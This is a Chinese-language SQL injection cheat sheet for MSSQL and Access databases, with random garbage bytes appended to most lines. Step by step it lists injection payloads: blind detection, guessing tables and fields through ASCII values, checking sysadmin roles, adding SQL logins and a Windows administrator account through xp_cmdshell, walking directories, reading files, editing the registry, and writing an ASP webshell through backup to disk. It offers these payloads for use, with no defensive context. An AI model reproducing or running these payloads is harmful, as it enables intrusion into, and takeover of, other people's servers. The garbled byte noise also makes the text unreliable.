1.判断是否有注入;and 1=1 ;and 1=2
Mkq(� T[)
2.初步判断是否是mssql ;and user>0 ^fz+4�1lE\
�@�|'5���n
3.注入参数是字符'and [查询条件] and ''=' wW>�)(&!F�
w�\}�?(�uO
4.搜索时没过滤参数的'and [查询条件] and '%25'=' >[6{LAe~hp
a6�kV!,.U
5.判断数据库系统 <�'G~8tA%v
Xv@SxS-5�l
;and (select count(*) from sysobjects)>0 mssql ��TY(b�P�q
r]ShZBAbYp
;and (select count(*) from msysobjects)>0 access xJ2*�LM-
M�a�|��qHg
tTU=�+*Io
P9�T5L��<5
6.猜数据库 ;and (select Count(*) from [数据库名])>0 .Y�w'oYnS�
e����*j�.�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Zt��Hm\VTS
%7�g�:}�O$
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 -�+t���]15
*�%�v�wM7�
9.(1)猜字段的ascii值(access) rWh6RYd�<T
Q?AmO�o-�a
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 N$�[$;Fm:
k=GG>]<i�
(2)猜字段的ascii值(mssql) �9�C�t��`�
u�d �f�e��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 T�lj:%�yK2
fm~kM�
J��
10.测试权限结构(mssql) n4lu���tnF
|j3'eW�&�=
nAD�X0KI�
�!`bio �cA
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- TPhTaKCio�
_�� pO���`
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- g/Cx�XSv@0
5'�a3huRtV
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �.�d/:�30Y
�PQ|6�9*2G
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- s_.�]4bl.8
��a?�YC�n!
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 5<L_|d)0�"
|y20Hi�':�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �6!^[];%xN
#0�� 6-:�
;and 1=(select IS_MEMBER('db_owner'));-- Q%�aU42?_1
}3R1��3���
�XYoIFv�?'
R�llY-�JBO
11.添加mssql和系统的帐户 ��;WL1B� �
W�(RF n`g\
;exec master.dbo.sp_addlogin username;-- � �Xtq{�%
;exec master.dbo.sp_password null,username,password;-- @Mvd'.r�<;
���i
ZL2p>
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- A[WV'�!A,
PCn�Q_A�-Q
;exec master.dbo.xp_cmdshell 'net user username password �PM�"�:Vd/
)6~�1 ^tD�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Jx��#k,�Z4
. |*f!�w}5
;exec master.dbo.xp_cmdshell 'net user username password /add';-- H Uo�y��Ly
7j�7e61
Ax
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- |
nJ�Zie8m
qNyzU��@��
���/WPv\L
L}#0I+M�l7
12.(1)遍历目录 �0N�=X�7�4
u9=Sp�gB#�
;create table dirs(paths varchar(100), id int) f`>/
H!�<2
"!K'�A7�.^
;insert dirs exec master.dbo.xp_dirtree 'c:\' LflFe�@2�
<\�zCpkZ'B
;and (select top 1 paths from dirs)>0 D�}3XFuZs_
y$hp@m�'@C
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) midsnG+jnf
fx8EB8A7K7
Q�C�PID��:
bN�^O��}�[
(2)遍历目录 c.\O�/N
��
9��t@:�4O
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��i�~J;G#b
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 YG���c^h(d
?�t�@�v&s
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �h;lirv�O|
�W��\f9jfD
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 a�vp;�*G�}
dMx4ykr�R�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ydv�3ow��N
7n�zGAz_W
Ut]+�k+ 4
�*sQcg8{^�
13.mssql中的存储过程 6B$q,"�%S@
JFL>nH0mk.
xp_regenumvalues 注册表根键, 子键 t]1ubt��2W
�T2�?�HR�x
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 f^e6<5gdf�
^5=UK7e5KY
xp_regread 根键,子键,键值名 ��sM��1�RU
$V6�^G*Q
;exec xp_regread �*��s}|Hy�
weMww,:�^[
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ?j7vZ}iRi�
K�7I�&sS^x
xp_regwrite 根键,子键, 值名, 值类型, 值 04!(okubyp
;evC�W$G=
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 0e�["]Tlnm
mxSKG>�
O
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 !�0/z>�#�b
OEr:�xK2�T
xp_regdeletevalue 根键,子键,值名 N1��2:{U�
M�^rM-�{?<
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
�>95Tv��J
��Hg�}I]!B
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �{m�E! V�f
�V's:>;���
XC1�5��K@K
�FDFH,J`_
14.mssql的backup创建webshell puJ#w1!x�`
!/K8�x�D�$
use model ��'k&?DZ!�
7d�h�1W@\�
create table cmd(str image); f<�y&��\'3
'UM!*�fk7C
insert into cmd(str) values (''); S�N�+��S�6
+?R�Gta'%k
backup database model to disk='c:\l.asp'; @E`?<|�B�}
!rxp?V n -
MQ][�mMM;w
&nt�BU]<�q
15.mssql内置函数 �\o3"~\|6C
BX�;5�wKfA
;and (select @@version)>0 获得Windows的版本号 2^e��xL� h
dTEJ=�d40�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 5T4"j;_.BL
jj\�[�7 O*
;and (select user_name())>0 爆当前系统的连接用户 ��{gf>*���
e{G_G��ycH
;and (select db_name())>0 得到当前连接的数据库 rq�Ca ���2
wCZO9sU:6=
|pZo2F!�.�
gvli�%��9n
16.简洁的webshell d&:H&o)T!
�>�',��y�
use model ;kaH�N;4?�
}wt%1v-10U
create table cmd(str image); �a��j|5 �#
o�}8{�Bh^�
insert into cmd(str) values (''); X=qS"�O� 1
o�6j"OZcv�
backup database model to disk='g:\wwwtest\l.asp';
